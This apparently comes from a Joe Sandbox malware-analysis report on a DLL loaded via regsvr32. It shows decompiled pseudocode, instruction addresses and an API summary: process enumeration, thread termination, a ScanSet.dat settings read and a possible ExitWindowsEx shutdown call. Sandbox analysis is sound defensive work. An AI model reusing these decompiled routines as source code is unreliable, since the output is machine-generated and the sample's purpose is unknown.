										_t224 =  *0x1006f050; // 0x0
										_t30 =  &(_t224[0xd6]); // 0x358
										E1002637C(_t30, _t224[0x43b], 0, _t315);
										_t295 =  *(_t322 + 0x14);
										_t226 =  *0x1006f050; // 0x0
										_t33 =  &(_t226[0xd6]); // 0x358
										E1002637C(_t33, _t226[0x43b], 1,  *(_t322 + 0x14));
										_t228 =  *0x1006f050; // 0x0
										_t34 =  &(_t228[0x43b]);
										 *_t34 = _t228[0x43b] + 1;
										__eflags =  *_t34;
									}
									_t204 =  *0x1006f050; // 0x0
									_t204[0x43a] = _t204[0x43a] + 1;
									_t205 = E100173A6();
									__eflags = _t205;
									_t271 = 0 | __eflags != 0x00000000;
									if(__eflags == 0) {
										break;
									} else {
										 *((intOrPtr*)(_t322 + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)( *_t205 + 0xc))))() + 0x10;
										_t209 =  *0x1006f050; // 0x0
										_push(_t209[0x43c]);
										_push(_t209[0x43b]);
										 *((char*)(_t322 + 0x9c)) = 2;
										E10003500(_t322 + 0x28, 0x1005873c, _t209[0x43a]);
										_t281 =  *0x1006f050; // 0x0
										_t317 =  *((intOrPtr*)(_t322 + 0x30));
										_t322 = _t322 + 0x14;
										_t282 =  &(_t281[0xc1]);
										E1001D2C4(_t282, _t317);
										_t213 = _t317 - 0x10;
										 *(_t322 + 0x88) = 1;
										_t50 =  &(_t213[3]); // 0xc
										_t307 = _t50;
										asm("lock xadd [edx], ecx");
										__eflags = (_t282 | 0xffffffff) - 1;
										if((_t282 | 0xffffffff) - 1 <= 0) {
											_t307 =  *( *_t213);
											 *((intOrPtr*)( *((intOrPtr*)(_t307 + 4))))(_t213);
										}
										_t215 =  *(_t322 + 0x14) + 0xfffffff0;
										 *(_t322 + 0x88) = 0;
										asm("lock xadd [ecx], edx");
										_t309 = (_t307 | 0xffffffff) - 1;
										__eflags = _t309;
										if(_t309 <= 0) {
											_t309 =  *( *_t215);
											 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))(_t215);
										}
										 *(_t322 + 0x88) = 0xffffffff;
										asm("lock xadd [ecx], edx");
										_t295 = (_t309 | 0xffffffff) - 1;
										__eflags = (_t309 | 0xffffffff) - 1;
										if((_t309 | 0xffffffff) - 1 <= 0) {
											_t216 =  *((intOrPtr*)( *_t319));
											_t295 =  *(_t216 + 4);
											 *( *(_t216 + 4))(_t319);
										}
										_t229 = _t229 + 1;
										_t319 = 0;
										__eflags = _t229 -  *((intOrPtr*)(_t322 + 0x24));
										if(__eflags < 0) {
											_t315 =  *(_t322 + 0x20);
											continue;
										} else {
											goto L2;
										}
									}
								}
							}
							goto L24;
						}
						E10001000(_t271, _t295, 0x80004005);
						goto L21;
					} else {
						goto L2;
					}
				}
				L24:
				_t132 =  *0x1006f050; // 0x0
				TerminateThread(_t132[0xa3], _t319);
				_t296 =  *0x1006f050; // 0x0
				SendMessageA(_t296[8], 0x111, 0xfff555ee, 0xf55555ee);
				E1002181C(_t229, _t312, _t315, _t329, 0x10058350, _t319, _t319);
				_t234 =  *0x1006f050; // 0x0
				_t234[0x43a] = _t319;
				_t297 =  *0x1006f050; // 0x0
				_t297[0x43b] = _t319;
				_t137 =  *0x1006f050; // 0x0
				_t137[0x43c] = _t319;
				_t235 =  *0x1006f050; // 0x0
				E1001D2C4( &(_t235[0x13f]), 0x10056948);
				_t237 =  *0x1006f050; // 0x0
				E1001D2C4( &(_t237[0x115]), 0x10056948);
				_t239 =  *0x1006f050; // 0x0
				E1001D39A( &(_t239[0x12a]), 1);
				_t241 =  *0x1006f050; // 0x0
				E1001D2C4( &(_t241[0xc1]), 0x10056948);
				_t243 =  *0x1006f050; // 0x0
				E1001D39A( &(_t243[0x100]), _t319);
				_t245 =  *0x1006f050; // 0x0
				E1001D39A( &(_t245[0xeb]), _t319);
				_t66 = _t322 + 0x28; // 0x1005694c
				E100205E2(_t66, _t329);
				_push(_t319);
				_push(0x40);
				_push("Setting\\ScanSet.dat");
				_t67 = _t322 + 0x34; // 0x1005694c
				 *(_t322 + 0x94) = 3;
				_t145 = E10020A24(_t67, _t297, _t329);
				_t330 = _t145;
				if(_t145 != 0) {
					_t69 = _t322 + 0x28; // 0x10001b00
					_t70 =  *_t69 + 0x28; // 0xcccccccc
					 *((intOrPtr*)( *_t70))(_t319, _t319, _t319);
					_push(_t319);
					_push(0x1000);
					_push(1);
					_t72 = _t322 + 0x34; // 0x10056970
					_t73 = _t322 + 0x48; // 0x10056980
					E10020058(3, _t73,  *_t69, _t312, _t315, _t330);
					_t331 =  *(_t322 + 0x50) & 0x00000001;
					 *(_t322 + 0x88) = 4;
					if(( *(_t322 + 0x50) & 0x00000001) == 0) {
						_t78 = _t322 + 0x4c; // 0x10035bfe
						_push( *_t78);
						_push(4);
						E10020287(3,  *_t78, _t312, _t315, _t331);
					}
					_t79 = _t322 + 0x60; // 0x1001cdb2
					_t151 =  *_t79;
					_t80 = _t322 + 0x64; // 0x1001cd6c
					_t255 =  *_t80;
					_t81 = _t151 + 4; // 0x1001cdb6
					_t299 = _t81;
					if(_t81 > _t255) {
						_t82 = _t322 + 0x3c; // 0x10056968
						E1001FADC(_t82, _t299, _t151 - _t255 + 4);
						_t83 = _t322 + 0x64; // 0x1001cdb2
						_t255 =  *_t83;
						_t84 = _t322 + 0x60; // 0x100027d0
						_t151 =  *_t84;
					}
					_t152 = _t151 + 4;
					_t334 =  *(_t322 + 0x50) & 0x00000001;
					 *(_t322 + 0x60) = _t152;
					if(( *(_t322 + 0x50) & 0x00000001) == 0) {
						_t89 = _t322 + 0x4c; // 0x1002f68d
						_push( *_t89);
						_push(4);
						_t152 = E10020287(3, _t299, _t312, _t315, _t334);
					}
					_t90 =  &(_t152[1]); // 0x4
					_t300 = _t90;
					if(_t90 > _t255) {
						_t91 = _t322 + 0x3c; // 0x1005695c
						E1001FADC(_t91, _t300, _t152 - _t255 + 4);
						_t92 = _t322 + 0x64; // 0x10035bfe
						_t255 =  *_t92;
						_t93 = _t322 + 0x60; // 0x10035bfe
						_t152 =  *_t93;
					}
					_t153 =  &(_t152[1]);
					_t337 =  *(_t322 + 0x50) & 0x00000001;
					 *(_t322 + 0x60) = _t153;
					if(( *(_t322 + 0x50) & 0x00000001) == 0) {
						_t98 = _t322 + 0x4c; // 0x10001480
						_push( *_t98);
						_push(4);
						_t153 = E10020287(3, _t300, _t312, _t315, _t337);
					}
					_t99 =  &(_t153[1]); // 0x4
					_t301 = _t99;
					if(_t99 > _t255) {
						_t100 = _t322 + 0x3c; // 0x10056950
						E1001FADC(_t100, _t301, _t153 - _t255 + 4);
						_t101 = _t322 + 0x64; // 0x1002f68d
						_t255 =  *_t101;
						_t102 = _t322 + 0x60; // 0x10017ddd
						_t153 =  *_t102;
					}
					_t154 =  &(_t153[1]);
					_t340 =  *(_t322 + 0x50) & 0x00000001;
					 *(_t322 + 0x60) = _t154;
					if(( *(_t322 + 0x50) & 0x00000001) == 0) {
						_t107 = _t322 + 0x4c; // 0x10060370
						_push( *_t107);
						_push(4);
						_t154 = E10020287(3, _t301, _t312, _t315, _t340);
					}
					_t108 =  &(_t154[1]); // 0x4
					_t302 = _t108;
					if(_t108 > _t255) {
						_t109 = _t322 + 0x3c; // 0x10056944
						E1001FADC(_t109, _t302, _t154 - _t255 + 4);
						_t110 = _t322 + 0x64; // 0x10001480
						_t255 =  *_t110;
						_t111 = _t322 + 0x60; // 0x10014ca0
						_t154 =  *_t111;
					}
					_t155 =  &(_t154[1]);
					_t343 =  *(_t322 + 0x50) & 0x00000001;
					 *(_t322 + 0x60) = _t155;
					if(( *(_t322 + 0x50) & 0x00000001) == 0) {
						_t116 = _t322 + 0x4c; // 0x100025a0
						_push( *_t116);
						_push(4);
						_t155 = E10020287(3, _t302, _t312, _t315, _t343);
					}
					_t117 =  &(_t155[1]); // 0x4
					_t297 = _t117;
					if(_t117 > _t255) {
						_t345 = _t155 - _t255 + 4;
						_t118 = _t322 + 0x3c; // 0x10056938
						E1001FADC(_t118, _t297, _t155 - _t255 + 4);
						_t119 = _t322 + 0x60; // 0x0
						_t155 =  *_t119;
					}
					_t315 =  *_t155;
					_t120 = _t322 + 0x38; // 0x10056934
					 *(_t322 + 0x60) =  &(_t155[1]);
					E1001FEB3(_t120, _t345);
					_t122 = _t322 + 0x28; // 0x10056924
					E10020580(3, _t122);
					_t346 =  *_t155 - _t319;
					if( *_t155 == _t319) {
						ExitWindowsEx(8, _t319);
					}
					_t123 = _t322 + 0x38; // 0x10056980
					 *(_t322 + 0x88) = 3;
					E1002001A(3, _t123, _t297, _t312, _t315, _t346);
				}
				_t125 = _t322 + 0x28; // 0x10056970
				 *(_t322 + 0x88) = 0xffffffff;
				E100206EF(3, _t125, _t297, _t312, _t315, _t346);
				_t127 = _t322 + 0x80; // 0x1001ca75
				 *[fs:0x0] =  *_t127;
				return 0;
			}




























































                                                                                                                0x1000ffb0
                                                                                                                0x1000ffb0
                                                                                                                0x1000ffb2
                                                                                                                0x1000ffbd
                                                                                                                0x1000ffbe
                                                                                                                0x1000ffc1
                                                                                                                0x1000ffc4
                                                                                                                0x1000ffc5
                                                                                                                0x1000ffcc
                                                                                                                0x1000ffd4
                                                                                                                0x1000ffda
                                                                                                                0x1000ffe0
                                                                                                                0x1000ffe2
                                                                                                                0x1000ffe8
                                                                                                                0x10010002
                                                                                                                0x10010002
                                                                                                                0x1001000b
                                                                                                                0x10010011
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000ffea
                                                                                                                0x1000ffef
                                                                                                                0x1000fff1
                                                                                                                0x1000fff4
                                                                                                                0x1000fff8
                                                                                                                0x1000fffc
                                                                                                                0x10010000
                                                                                                                0x10010064
                                                                                                                0x10010064
                                                                                                                0x1001006b
                                                                                                                0x1001006d
                                                                                                                0x10010072
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001007a
                                                                                                                0x10010084
                                                                                                                0x10010088
                                                                                                                0x1001008a
                                                                                                                0x10010091
                                                                                                                0x10010284
                                                                                                                0x10010284
                                                                                                                0x10010289
                                                                                                                0x1001028a
                                                                                                                0x1001028f
                                                                                                                0x10010292
                                                                                                                0x10010292
                                                                                                                0x10010298
                                                                                                                0x100102a9
                                                                                                                0x100102ab
                                                                                                                0x100102ad
                                                                                                                0x10010017
                                                                                                                0x10010017
                                                                                                                0x1001001e
                                                                                                                0x10010024
                                                                                                                0x10010029
                                                                                                                0x1001002b
                                                                                                                0x00000000
                                                                                                                0x10010031
                                                                                                                0x10010031
                                                                                                                0x10010032
                                                                                                                0x1001003a
                                                                                                                0x10010041
                                                                                                                0x10010049
                                                                                                                0x1001004e
                                                                                                                0x10010054
                                                                                                                0x10010054
                                                                                                                0x00000000
                                                                                                                0x1001002b
                                                                                                                0x10010097
                                                                                                                0x10010097
                                                                                                                0x1001009a
                                                                                                                0x00000000
                                                                                                                0x100100a0
                                                                                                                0x100100a6
                                                                                                                0x100100ab
                                                                                                                0x100100b0
                                                                                                                0x100100b6
                                                                                                                0x100100bb
                                                                                                                0x100100c1
                                                                                                                0x100100c6
                                                                                                                0x100100c7
                                                                                                                0x100100ca
                                                                                                                0x100100ce
                                                                                                                0x100100d1
                                                                                                                0x100100d9
                                                                                                                0x100100dc
                                                                                                                0x100100e0
                                                                                                                0x100100e2
                                                                                                                0x100100e9
                                                                                                                0x100100f8
                                                                                                                0x10010100
                                                                                                                0x10010105
                                                                                                                0x1001010d
                                                                                                                0x1001010f
                                                                                                                0x10010111
                                                                                                                0x1001012a
                                                                                                                0x10010132
                                                                                                                0x10010137
                                                                                                                0x10010146
                                                                                                                0x1001014c
                                                                                                                0x10010151
                                                                                                                0x10010155
                                                                                                                0x10010164
                                                                                                                0x1001016a
                                                                                                                0x1001016f
                                                                                                                0x10010174
                                                                                                                0x10010174
                                                                                                                0x10010174
                                                                                                                0x10010174
                                                                                                                0x1001017b
                                                                                                                0x10010180
                                                                                                                0x10010187
                                                                                                                0x1001018e
                                                                                                                0x10010190
                                                                                                                0x10010195
                                                                                                                0x00000000
                                                                                                                0x1001019b
                                                                                                                0x100101a7
                                                                                                                0x100101ab
                                                                                                                0x100101c2
                                                                                                                0x100101c3
                                                                                                                0x100101cf
                                                                                                                0x100101d7
                                                                                                                0x100101dc
                                                                                                                0x100101e2
                                                                                                                0x100101e6
                                                                                                                0x100101ea
                                                                                                                0x100101f0
                                                                                                                0x100101f5
                                                                                                                0x100101f8
                                                                                                                0x10010200
                                                                                                                0x10010200
                                                                                                                0x10010206
                                                                                                                0x1001020b
                                                                                                                0x1001020d
                                                                                                                0x10010211
                                                                                                                0x10010217
                                                                                                                0x10010217
                                                                                                                0x1001021d
                                                                                                                0x10010220
                                                                                                                0x1001022e
                                                                                                                0x10010232
                                                                                                                0x10010233
                                                                                                                0x10010235
                                                                                                                0x10010239
                                                                                                                0x1001023f
                                                                                                                0x1001023f
                                                                                                                0x10010241
                                                                                                                0x10010252
                                                                                                                0x10010256
                                                                                                                0x10010257
                                                                                                                0x10010259
                                                                                                                0x1001025e
                                                                                                                0x10010260
                                                                                                                0x10010264
                                                                                                                0x10010264
                                                                                                                0x10010266
                                                                                                                0x10010269
                                                                                                                0x1001026b
                                                                                                                0x1001026f
                                                                                                                0x10010060
                                                                                                                0x00000000
                                                                                                                0x10010275
                                                                                                                0x00000000
                                                                                                                0x10010275
                                                                                                                0x1001026f
                                                                                                                0x10010195
                                                                                                                0x1001009a
                                                                                                                0x00000000
                                                                                                                0x10010091
                                                                                                                0x1001027f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10010000
                                                                                                                0x100102b3
                                                                                                                0x100102b3
                                                                                                                0x100102c0
                                                                                                                0x100102c6
                                                                                                                0x100102df
                                                                                                                0x100102e8
                                                                                                                0x100102ed
                                                                                                                0x100102f3
                                                                                                                0x100102f9
                                                                                                                0x100102ff
                                                                                                                0x10010305
                                                                                                                0x1001030a
                                                                                                                0x10010310
                                                                                                                0x10010321
                                                                                                                0x10010326
                                                                                                                0x10010337
                                                                                                                0x1001033c
                                                                                                                0x1001034a
                                                                                                                0x1001034f
                                                                                                                0x10010360
                                                                                                                0x10010365
                                                                                                                0x10010372
                                                                                                                0x10010377
                                                                                                                0x10010384
                                                                                                                0x10010389
                                                                                                                0x1001038d
                                                                                                                0x10010392
                                                                                                                0x10010393
                                                                                                                0x1001039a
                                                                                                                0x1001039f
                                                                                                                0x100103a3
                                                                                                                0x100103aa
                                                                                                                0x100103af
                                                                                                                0x100103b1
                                                                                                                0x100103b7
                                                                                                                0x100103bb
                                                                                                                0x100103c5
                                                                                                                0x100103c7
                                                                                                                0x100103c8
                                                                                                                0x100103cd
                                                                                                                0x100103cf
                                                                                                                0x100103d4
                                                                                                                0x100103d8
                                                                                                                0x100103dd
                                                                                                                0x100103e2
                                                                                                                0x100103ea
                                                                                                                0x100103ec
                                                                                                                0x100103f0
                                                                                                                0x100103f1
                                                                                                                0x100103f3
                                                                                                                0x100103f3
                                                                                                                0x100103f8
                                                                                                                0x100103f8
                                                                                                                0x100103fc
                                                                                                                0x100103fc
                                                                                                                0x10010400
                                                                                                                0x10010400
                                                                                                                0x10010405
                                                                                                                0x1001040d
                                                                                                                0x10010411
                                                                                                                0x10010416
                                                                                                                0x10010416
                                                                                                                0x1001041a
                                                                                                                0x1001041a
                                                                                                                0x1001041a
                                                                                                                0x1001041e
                                                                                                                0x10010421
                                                                                                                0x10010426
                                                                                                                0x1001042a
                                                                                                                0x1001042c
                                                                                                                0x10010430
                                                                                                                0x10010431
                                                                                                                0x10010433
                                                                                                                0x10010433
                                                                                                                0x10010438
                                                                                                                0x10010438
                                                                                                                0x1001043d
                                                                                                                0x10010445
                                                                                                                0x10010449
                                                                                                                0x1001044e
                                                                                                                0x1001044e
                                                                                                                0x10010452
                                                                                                                0x10010452
                                                                                                                0x10010452
                                                                                                                0x10010456
                                                                                                                0x10010459
                                                                                                                0x1001045e
                                                                                                                0x10010462
                                                                                                                0x10010464
                                                                                                                0x10010468
                                                                                                                0x10010469
                                                                                                                0x1001046b
                                                                                                                0x1001046b
                                                                                                                0x10010470
                                                                                                                0x10010470
                                                                                                                0x10010475
                                                                                                                0x1001047d
                                                                                                                0x10010481
                                                                                                                0x10010486
                                                                                                                0x10010486
                                                                                                                0x1001048a
                                                                                                                0x1001048a
                                                                                                                0x1001048a
                                                                                                                0x1001048e
                                                                                                                0x10010491
                                                                                                                0x10010496
                                                                                                                0x1001049a
                                                                                                                0x1001049c
                                                                                                                0x100104a0
                                                                                                                0x100104a1
                                                                                                                0x100104a3
                                                                                                                0x100104a3
                                                                                                                0x100104a8
                                                                                                                0x100104a8
                                                                                                                0x100104ad
                                                                                                                0x100104b5
                                                                                                                0x100104b9
                                                                                                                0x100104be
                                                                                                                0x100104be
                                                                                                                0x100104c2
                                                                                                                0x100104c2
                                                                                                                0x100104c2
                                                                                                                0x100104c6
                                                                                                                0x100104c9
                                                                                                                0x100104ce
                                                                                                                0x100104d2
                                                                                                                0x100104d4
                                                                                                                0x100104d8
                                                                                                                0x100104d9
                                                                                                                0x100104db
                                                                                                                0x100104db
                                                                                                                0x100104e0
                                                                                                                0x100104e0
                                                                                                                0x100104e5
                                                                                                                0x100104e9
                                                                                                                0x100104ed
                                                                                                                0x100104f1
                                                                                                                0x100104f6
                                                                                                                0x100104f6
                                                                                                                0x100104f6
                                                                                                                0x100104fa
                                                                                                                0x100104ff
                                                                                                                0x10010503
                                                                                                                0x10010507
                                                                                                                0x1001050c
                                                                                                                0x10010510
                                                                                                                0x10010515
                                                                                                                0x10010517
                                                                                                                0x1001051c
                                                                                                                0x1001051c
                                                                                                                0x10010522
                                                                                                                0x10010526
                                                                                                                0x1001052d
                                                                                                                0x1001052d
                                                                                                                0x10010532
                                                                                                                0x10010536
                                                                                                                0x10010541
                                                                                                                0x10010548
                                                                                                                0x1001054f
                                                                                                                0x1001055e

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 100102A7
                                                                                                                • TerminateThread.KERNEL32(?,00000000,DF7C0CDA), ref: 100102C0
                                                                                                                • SendMessageA.USER32 ref: 100102DF
                                                                                                                  • Part of subcall function 1000CD90: _memset.LIBCMT ref: 1000CE18
                                                                                                                  • Part of subcall function 1000CD90: EnumProcesses.PSAPI(?,00001000,?,?,00000000,00000103), ref: 1000CE2F
                                                                                                                  • Part of subcall function 1000CD90: OpenProcess.KERNEL32(00000410,00000000,?,?,00001000,?,?,00000000,00000103), ref: 1000CE57
                                                                                                                  • Part of subcall function 1000CD90: EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 1000CE74
                                                                                                                  • Part of subcall function 1000CD90: GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 1000CE8C
                                                                                                                  • Part of subcall function 1000CD90: GetShortPathNameA.KERNEL32 ref: 1000CEA1
                                                                                                                  • Part of subcall function 1000CD90: __itoa.LIBCMT ref: 1000CEB2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumMessageNameProcessSend$FileModuleModulesOpenPathProcessesShortTerminateThread__itoa_memset
                                                                                                                • String ID: Setting\ScanSet.dat
                                                                                                                • API String ID: 581762207-908802073
                                                                                                                • Opcode ID: b376410783cdb246a1f32bd2672f183425c69d2eed36791397f28db9980777e1
                                                                                                                • Instruction ID: a08358b2d6b05e09ee734bb055c70b23d7c28da2dba7e2bbd964ecf404e5a9f5
                                                                                                                • Opcode Fuzzy Hash: b376410783cdb246a1f32bd2672f183425c69d2eed36791397f28db9980777e1
                                                                                                                • Instruction Fuzzy Hash: F2F18B752043419FE304DB64CD85FAA77E6FB88358F44892CF5898B292DBB0F985CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001005E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 376windowthreadshutdownCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E1001005E(void* __ebx, long __ebp, intOrPtr _a4, char _a12, signed int _a16, signed int* _a20, signed int _a24, char _a28, signed int _a32, signed int _a36, char _a48, long* _a52, char _a56, char _a92, char _a96, char _a112, char _a120, char _a128, char _a132, intOrPtr _a136, long _a140) {
				signed int _v0;
				char _v4;
				signed int _v24;
				signed int _t123;
				signed int _t128;
				void* _t136;
				intOrPtr _t142;
				long* _t143;
				long* _t144;
				long* _t145;
				long* _t146;
				void* _t172;
				void* _t178;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t191;
				signed int _t193;
				intOrPtr _t203;
				signed int _t212;
				void* _t213;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				void* _t227;
				long _t231;
				long _t233;
				void* _t253;

				_t231 = __ebp;
				_t178 = __ebx;
				while(1) {
					__esi = _a32;
					__eax = E100173A6();
					__ecx = 0;
					__eflags = __eax - __ebp;
					__ecx = 0 | __eax != __ebp;
					__eflags = __ecx - __ebp;
					if(__ecx == __ebp) {
						break;
					}
					__edx =  *__eax;
					__ecx = __eax;
					 *((intOrPtr*)(__edx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0xc))))();
					__eax =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
					_a24 =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
					__eflags = __ebx - __ebp;
					_a136 = __ebp;
					if(__eflags < 0) {
						L20:
						__eax = E1001729E(__ebx, __ecx, __edi, __esi, __eflags);
						goto L21;
					} else {
						__eflags = __ebx -  *((intOrPtr*)(__esi + 8));
						if(__eflags >= 0) {
							goto L20;
						} else {
							__ecx =  *(__esi + 4);
							__eax = __ecx + __ebx * 4;
							_push(__ecx + __ebx * 4);
							__ecx =  &_a24;
							__eax = E10001FF0( &_a24);
							__ecx =  *0x1006f050; // 0x0
							__esi = _a20;
							__ecx = __ecx + 0x4fc;
							__eax = E1001D2C4(__ecx, __esi);
							_push(__ecx);
							__ebp = __esi - 0x10;
							_a20 = __esp;
							__edi = __esp;
							__eax = E10001080(__ebx, __ebp);
							__eax = __eax + 0x10;
							__esp =  &(__esp[1]);
							__edx =  &_a12;
							 *__edi = __eax;
							__ecx =  *0x1006f050; // 0x0
							E1000E6F0(__ecx, __edx, __eflags, __edx) = _a4;
							_a120 = 1;
							__eax = E1003BD06(_a4, 0x10056948);
							__eflags = __eax;
							__eax = __eax & 0xffffff00 | __eax != 0x00000000;
							__eflags = __al;
							if(__al != 0) {
								__eax =  *0x1006f050; // 0x0
								__edx =  *(__eax + 0x10ec);
								_t23 = __eax + 0x358; // 0x358
								__ecx = _t23;
								__eax = E10026562(_t23, 1,  *(__eax + 0x10ec), 0x10056948, 0, 0, 0, 0);
								__eax =  *0x1006f050; // 0x0
								__ecx =  *(__eax + 0x10ec);
								_t25 = __eax + 0x358; // 0x358
								__ecx = _t25;
								__eax = E1002637C(_t25,  *(__eax + 0x10ec), 0, __esi);
								__edx = _v24;
								__eax =  *0x1006f050; // 0x0
								__ecx =  *(__eax + 0x10ec);
								_t28 = __eax + 0x358; // 0x358
								__ecx = _t28;
								__eax = E1002637C(_t28,  *(__eax + 0x10ec), 1, __edx);
								__eax =  *0x1006f050; // 0x0
								_t29 = __eax + 0x10ec;
								 *_t29 =  *(__eax + 0x10ec) + 1;
								__eflags =  *_t29;
							}
							__eax =  *0x1006f050; // 0x0
							 *(__eax + 0x10e8) =  *(__eax + 0x10e8) + 1;
							__eax = E100173A6();
							__ecx = 0;
							__eflags = __eax;
							__ecx = 0 | __eax != 0x00000000;
							__eflags = __ecx;
							if(__ecx == 0) {
								break;
							} else {
								__edx =  *__eax;
								__ecx = __eax;
								 *((intOrPtr*)(__edx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0xc))))();
								__eax =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
								_a24 =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
								__eax =  *0x1006f050; // 0x0
								__ecx =  *(__eax + 0x10f0);
								__edx =  *(__eax + 0x10ec);
								__eax =  *(__eax + 0x10e8);
								_push(__ecx);
								_push(__edx);
								__ecx =  &_a24;
								_a132 = 2;
								__eax = E10003500( &_a24, 0x1005873c, __eax);
								__ecx =  *0x1006f050; // 0x0
								__esi = _a24;
								__ecx = __ecx + 0x304;
								__eax = E1001D2C4(__ecx, __esi);
								__eax = __esi - 0x10;
								_a128 = 1;
								_t45 = __eax + 0xc; // 0xc
								__edx = _t45;
								__ecx = __ecx | 0xffffffff;
								asm("lock xadd [edx], ecx");
								__ecx = __ecx - 1;
								__eflags = __ecx;
								if(__ecx <= 0) {
									__ecx =  *__eax;
									__edx =  *( *__eax);
									 *((intOrPtr*)(__edx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4))))(__eax);
								}
								__eax = _a16;
								__eax = _a16 + 0xfffffff0;
								_a132 = 0;
								__ecx = __eax + 0xc;
								__edx = __edx | 0xffffffff;
								asm("lock xadd [ecx], edx");
								__edx = __edx - 1;
								__eflags = __edx;
								if(__edx <= 0) {
									__ecx =  *__eax;
									__edx =  *( *__eax);
									 *((intOrPtr*)(__edx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 4))))(__eax);
								}
								_a132 = 0xffffffff;
								__ecx =  &_a12;
								__edx = __edx | 0xffffffff;
								asm("lock xadd [ecx], edx");
								__edx = __edx - 1;
								__eflags = __edx;
								if(__edx <= 0) {
									__ecx = _v0;
									__eax =  *__ecx;
									__edx =  *( *__ecx + 4);
									__eax =  *__edx(__ebp);
								}
								__ebx = __ebx + 1;
								__ebp = 0;
								__eflags = __ebx - _a32;
								if(__eflags < 0) {
									continue;
								} else {
									_t229 = _a140;
									_t227 = SendMessageA;
									if(_t229 != 0) {
										L2:
										_t212 =  *0x1006f050; // 0x0
										_t213 = _t212 + 0x550;
										_t172 = E10026483(_t213, _t229);
										_t236 = _t172;
										if(_t172 == 0) {
											L21:
											E1000FE50(_t231, _t229);
											_t233 = _t233 + 4;
										} else {
											_push(_t213);
											_t215 =  *0x1006f050; // 0x0
											_a140 = _t233;
											_push(_t229);
											E10026A46(_t178, _t215 + 0x550, _t218, _t227, _t229, _t236);
											_t217 =  *0x1006f050; // 0x0
											E1000EC00(_t217, _t218, _t236, _t233);
										}
										_t214 =  *0x1006f050; // 0x0
										_t218 =  *(_t214 + 0x570);
										_t229 = SendMessageA( *(_t214 + 0x570), 0x110a, 1, _t229);
										_t237 = _t229 - _t231;
										if(_t229 != _t231) {
											goto L2;
										}
									}
								}
							}
						}
					}
					_t123 =  *0x1006f050; // 0x0
					TerminateThread( *(_t123 + 0x28c), _t231);
					_t219 =  *0x1006f050; // 0x0
					SendMessageA( *(_t219 + 0x20), 0x111, 0xfff555ee, 0xf55555ee);
					E1002181C(_t178, _t227, _t229, _t237, 0x10058350, _t231, _t231);
					_t182 =  *0x1006f050; // 0x0
					 *(_t182 + 0x10e8) = _t231;
					_t220 =  *0x1006f050; // 0x0
					 *(_t220 + 0x10ec) = _t231;
					_t128 =  *0x1006f050; // 0x0
					 *(_t128 + 0x10f0) = _t231;
					_t183 =  *0x1006f050; // 0x0
					E1001D2C4(_t183 + 0x4fc, 0x10056948);
					_t185 =  *0x1006f050; // 0x0
					E1001D2C4(_t185 + 0x454, 0x10056948);
					_t187 =  *0x1006f050; // 0x0
					E1001D39A(_t187 + 0x4a8, 1);
					_t189 =  *0x1006f050; // 0x0
					E1001D2C4(_t189 + 0x304, 0x10056948);
					_t191 =  *0x1006f050; // 0x0
					E1001D39A(_t191 + 0x400, _t231);
					_t193 =  *0x1006f050; // 0x0
					E1001D39A(_t193 + 0x3ac, _t231);
					_t61 =  &_v0; // 0x1005694c
					E100205E2(_t61, _t237);
					_push(_t231);
					_push(0x40);
					_push("Setting\\ScanSet.dat");
					_t62 =  &_v0; // 0x1005694c
					_a96 = 3;
					_t136 = E10020A24(_t62, _t220, _t237);
					_t238 = _t136;
					if(_t136 != 0) {
						_t64 =  &_a24; // 0x10001b00
						_t65 =  *_t64 + 0x28; // 0xcccccccc
						 *((intOrPtr*)( *_t65))(_t231, _t231, _t231);
						_push(_t231);
						_push(0x1000);
						_push(1);
						_t67 =  &_a12; // 0x10056970
						_t68 =  &_a28; // 0x10056980
						E10020058(3, _t68,  *_t64, _t227, _t229, _t238);
						_t239 = _a36 & 0x00000001;
						_a92 = 4;
						if((_a36 & 0x00000001) == 0) {
							_t73 =  &_a32; // 0x10035bfe
							_push( *_t73);
							_push(4);
							E10020287(3,  *_t73, _t227, _t229, _t239);
						}
						_t74 =  &_a52; // 0x1001cdb2
						_t142 =  *_t74;
						_t75 =  &_a56; // 0x1001cd6c
						_t203 =  *_t75;
						_t76 = _t142 + 4; // 0x1001cdb6
						_t222 = _t76;
						if(_t76 > _t203) {
							_t77 =  &_a12; // 0x10056968
